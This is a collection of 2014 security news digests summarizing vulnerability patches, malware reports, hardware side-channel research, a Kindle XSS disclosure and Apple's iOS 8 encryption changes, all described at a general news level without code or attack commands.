ID: IRCNE2014082293
Date: 2014-08-19

According to “ITPro”, Apple has released a security update to fix seven vulnerabilities found in Safari’s Webkit framework.
The update can be found on the Apple support page now for OS X Lion v10.7.5, OS X Lion Server v10.7.5, OS X Mountain Lion v10.8.5 and OS X Mavericks v10.9.4. It applies to Safari 6.1.6 and Safari 7.0.6.
According to Apple, several memory corruption issues were present in Webkit that have been addressed with improved memory handling.
The US-based company said: “Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution.”
The global tech giant refused to comment on whether hackers have exploited the vulnerabilities. It said: “For the protection of our customers, Apple does not disclose, discuss or confirm security issues until a full investigation has occurred and any necessary patches or releases are available.
Even so, the United States Computer Emergency Readiness Team (US-CERT) is urging IT managers to install the updates as a matter of urgency.
"Users and administrators are encouraged to review Apple security update... and apply the necessary updates," its advisory states.
Problems with Webkit are not uncommon. It is the open source framework behind Safari, Google Chrome and other OS X applications such as Mail.

Number: IRCNE2014082294
Date: 2014-08-19

According to “techworld”, Heartbleed may have been a software bug, but it highlighted glaring weaknesses in existing hardware architectures, which remain vulnerable to memory-bound attacks, a university researcher said this week.
Data is vulnerable to hackers when in transit or in computer memory, said Ruby Lee, professor of engineering at Princeton University's Department of Electrical Engineering, at a presentation to the Hot Chips conference.
The weakness is in the memory and cache, or secondary memory where data temporarily resides before being sent for processing or storage.
Securing memory was a hot discussion topic among chip experts at the forum, and Heartbleed sparked discussions on how hackers could access data from memory, storage and interconnects. Chip makers talked about hardware being the first line of defense against such attacks, and proposed techniques to scramble data and secure keys within a chip. A research project at Princeton funded by the U.S. Department of Homeland Security recommended a new architecture that could secure memory and cache.
Heartbleed exposed a critical defect in affected versions of the OpenSSL software library, which enables secure communication over the Internet and networks. Heartbleed affected servers, networking gear and appliances, and hardware makers have since issued patches to protect systems.
"Lots of people have talked about the attacks, but very few people have talked about the solutions," Lee said. "The hardware is still leaking out your secret keys all the time. Every single piece of hardware that has a cache is vulnerable to cache-side channel leakage."
It's difficult to launch software attacks on hardware, but side-channel attacks can be dangerous, Lee said.
To mitigate such attacks, Lee and researchers at Princeton have reconstructed cache architecture so tracks left by the victim are effectively wiped out, making it difficult to carry out side-channel attacks. The cache architecture, called Newcache, could replace the exposed cache and memory in systems today.
Newcache is structured like regular cache, but has dynamic and randomized cache mapping that will make it harder for attackers to correlate memory usage to key bits. That will make it hard for hackers to map the cache and extract data.
Newcache is ready to implement, and the additional security measures won't hurt performance, Lee said. Memory typically slows down when new features -- like ECC for error correction -- are added. But benchmarks of Newcache actually showed improvements in system performance, Lee said.
It could take years for chip and system makers to change memory features, but Lee said chip makers need to start thinking about securing data within systems, Lee said.

Number: IRCNE2014082295
Date: 2014-08-19

According to “techworld”, a type of malware called Reveton, which falsely warns users they've broken the law and demands payment of a fine, has been upgraded with powerful password stealing functions, according to Avast.
The malware often infects computers via drive-by download when a person visits a website rigged to automatically exploit software vulnerabilities. Users are helpless after the computer is locked, with Reveton demanding a few hundred dollars as ransom payable various web-money services.
Avast analyzed a version of Reveton that has a module containing the Pony password stealer, which can also steal virtual currency stored on a computer such as bitcoin.
Pony can pluck and decrypt encrypted passwords for FTP, VPN and email clients, web browsers and instant messaging programs.
The version of Reveton analyzed by Avast also has another password stealer from the Papras family of malware. It's not as effective as Pony but can disable security programs, the company wrote on its blog.

Number: IRCNE2014092316
Date: 2014-09-14

According to “techworld”, a critical vulnerability in a popular e-commerce extension for the Joomla content management system allows malicious users to gain super-admin privileges to sites that run the software.
The VirtueMart extension, which allows users to set up online shops on their websites, has been downloaded more than 3.5 million times, said Marc-Alexandre Montpas, a researcher at Web security firm Sucuri, in a blog post Wednesday. "With super-admin access, the attacker has full control of the site and database."
The issue was discovered last week and was patched in VirtueMart 2.6.10, released on Sept. 4. The VirtueMart page in the Joomla extensions catalogue advises users that "everyone using a version lower than 2.6.10 should update as soon as possible for security reasons."
"VirtueMart uses Joomla's JUser class 'bind' and 'save' methods to handle user accounts information," Montpas said. "We actually think the problem is on the Joomla class itself, so we will not disclose any more details."

Number: IRCNE2014092317
Date: 2014-09-16

According to “techworld”, VMware has updated third-party libraries and components used by its vSphere server virtualization platform.
The company released vCenter Server 5.5 Update 2 in order to include a patch for a remote code execution vulnerability in the Apache Struts Web framework used inside the product.
The same vCenter Server release updates the Apache Tomcat component to version 7.0.52, originally released in February, which includes fixes for two denial-of-service and one information disclosure vulnerabilities.
VCenter Server 5.5 Update 2 and vCenter Update Manager 5.5 Update 2 change the bundled Java Runtime Environment (JRE) version to 1.7 Update 55 that was released in April. This Java version contains patches for 37 security vulnerabilities.
The VMware vSphere Hypervisor (ESXi) received a patch called ESXi550-201409101-SG that updates the included GNU C Library (glibc) in order to address two buffer overflow vulnerabilities that can trigger denial-of-service conditions.

ID: IRCNE2014082295
Date: 2014-08-20

According to “ComputerWorld”, Symantec will consolidate its cluttered Norton line of security software, folding nine products into one online service that can be used across desktop computers and mobile devices.
The product, in beta now, will simply be called "Norton Security" and cost $79 a year when it goes on sale in North America on Sept. 23, said Gerry Egan, senior director of product management. It replaces Norton Internet Security, Norton AntiVirus and Norton360, among others.
Symantec, one of the largest security vendors, has been working for more than a year to revise its product line as it faces strong competition in the low-margin consumer antivirus business.
Over the years, Symantec added new products as new threats emerged, but people had trouble figuring out which product was the right one for them.
"What we realized was we actually ended up confusing a lot of customers," Egan said.
Overall, Symantec has aimed to make Norton Security an easy-to-manage online service along the lines of Netflix or iTunes. The user interface has been improved for simpler device management.
Consumers can sign up for a Norton Security online account and then download the appropriate product for Windows or Apple OS X computers, or Android or iOS mobile devices.
There will be a limit on the number of devices that Norton Security can be used on. The limit hasn't been determined yet, Egan said, but it will aim to prevent abuse and should be appropriate for most customers, he said.
Norton Security has the usual antivirus, antispyware and spam monitoring functions. Symantec will offer a cloud-based backup feature as an option.
Pricing for the backup feature hasn't been set yet, but Egan said it will be generally the same as in other Norton products, starting around $10 for 25 GB of storage.
Customers on versions of Norton due to be retired won't be forced off the old products, although Symantec will encourage them to move to the latest version, Egan said.
Egan said Symantec expects to release Norton Security in Europe around early October and then later in Asia Pacific.

Number: IRCNE2014082297
Date: 2014-08-23

According to “zdnet”, US researchers have discovered a flaw which may exist across Android, Windows, and iOS operating systems, and could allow popular services such as Gmail to become compromised.
Security experts from the University of California Riverside Bourns College of Engineering and the University of Michigan identified a weakness believed to exist in all of the above operating systems, which could allow a cyberattacker to steal sensitive data through malicious applications.
The weakness was tested through an Android smartphone, but the researchers claim the method could be used across all of the platforms -- as each OS shares a similar feature: the ability for applications to access a mobile device's shared memory. However, no tests have yet been conducted on other systems.
The attack works through a user downloading a seemingly harmless application, such as background wallpaper. Once installed, the researchers were able to exploit a newly discovered public side channel, the shared memory of a process, which can be accessed without permissions or app privileges.
Changes within the shared memory are then monitored, and these changes are correlated with what the team calls an "activity transition event." In other words, when a user is actively using an app, for example, to log into Gmail or take a picture of a cheque so it can be deposited online via Chase Bank, activity changes are noted.
There are two stages to this attack: firstly, the attack needs to take place in real time, such as the moment when the user is logging into Gmail. Secondly, the hack needs to be done so it is undetectable by the user -- which can be achieved through good timing.
The method used to exploit the flaw was successful "between 82 percent and 92 percent of the time" on six of the seven apps tested. Among the applications that were successfully infiltrated were Gmail, Chase Bank and H&R Block.Attacks on Gmail were successful 92 percent of the time, as were attacks on H&R Block.
The only app that was difficult to penetrate was Amazon, with a 48 percent success rate.

Number: IRCNE2014092309
Date: 2014-09-09

According to “zdnet”, Adobe has announced that a patch to Acrobat and Reader, scheduled for release on Tuesday, September 9, will not be released until the week of September 15.
The update will include new versions of Reader and Acrobat for Windows and Mac. The new versions will address one or more critical vulnerabilities in the software, the exact nature of which remain unspecified for now.
The affected versions are Reader and Acrobat X 10.1.11 and earlier and Reader and Acrobat XI 11.0.08.

ID: IRCNE2014092319
Date: 2014-09-17

According to “ZDNet”, a security vulnerability exists in Amazon's Kindle Library, which can be used to "compromise" an entire Amazon.com account, according to the researcher who found the flaw.
German researcher Benjamin Mussler published a proof-of-exploit on his blog after claiming Amazon previously fixed the flaw, but reintroduced it later on. Mussler said Amazon had not responded after he submitted it for the second time, which led him to publicly disclose the flaw.
The vulnerability, known as a cross-site script (XSS), can be included in a Kindle e-book's metadata, such as the title, which automatically executes as soon as the victim opens their Amazon Kindle Library page on Amazon.com.
"As a result, Amazon account cookies can be accessed by and transferred to the attacker and the victim's Amazon account can be compromised," Mussler said.
Anyone who uses Amazon's Kindle Library to store e-books or deliver them to a Kindle, he said, is affected by the bug.
Mussler warned that those who obtain e-books from untrustworthy sources, such as pirated copies of popular books, are at greater risk than those who buy through Amazon.com.
The researcher said he first reported the vulnerability privately to Amazon in November 2013, and was fixed with a relatively quick turnaround. But after the retail giant rolled out a new version of the "Manage Your Kindle" web application, the bug was reintroduced.
"Amazon chose not to respond to my subsequent email detailing the issue, and two months later, the vulnerability remains unfixed," he said.

ID: IRCNE2014092324
Date: 2014-09-20

According to “ZDNet”, if the feds are after your iPhone or iPad, it probably won't be Apple's door they'll be knocking on.
After the PRISM scandal broke, the news threw Apple and other Silicon Valley under the bus over allegations that they knowingly participated in a secret surveillance program.
But that wasn't the case at all, as the recently released Yahoo documents showed. Yahoo was threatened with bankruptcy if it didn't comply with the U.S. government's data demands, for the first time solidifying the rebuttals from the named nine technology companies that they were not complicit in state surveillance.
Now, Apple is going one step further — adjusting its encryption and security practices, and its privacy policy, in order to prevent law enforcement from cracking open its smartphone and tablet line-up.
Apple's new mobile operating system, iOS 8, which was released on Wednesday, lands with reworked encryption, forcing law enforcement, federal agents, and intelligence agencies to go to the device owner themselves rather than Apple.
The new encryption methods prevent even Apple from accessing even the relatively small amount of data it holds on users.
"Unlike our competitors, Apple cannot bypass your passcode and therefore cannot access this data," the company said in its new privacy policy, updated Wednesday. "So it's not technically feasible for us to respond to government warrants for the extraction of this data from devices in their possession running iOS 8."
There are some caveats, however. For the iCloud data it stores, Apple still has the ability (and the legal responsibility) to turn over data it stores on its own servers, or third-party servers it uses to support the service.
iCloud data can include photos, emails, music, documents, and contacts.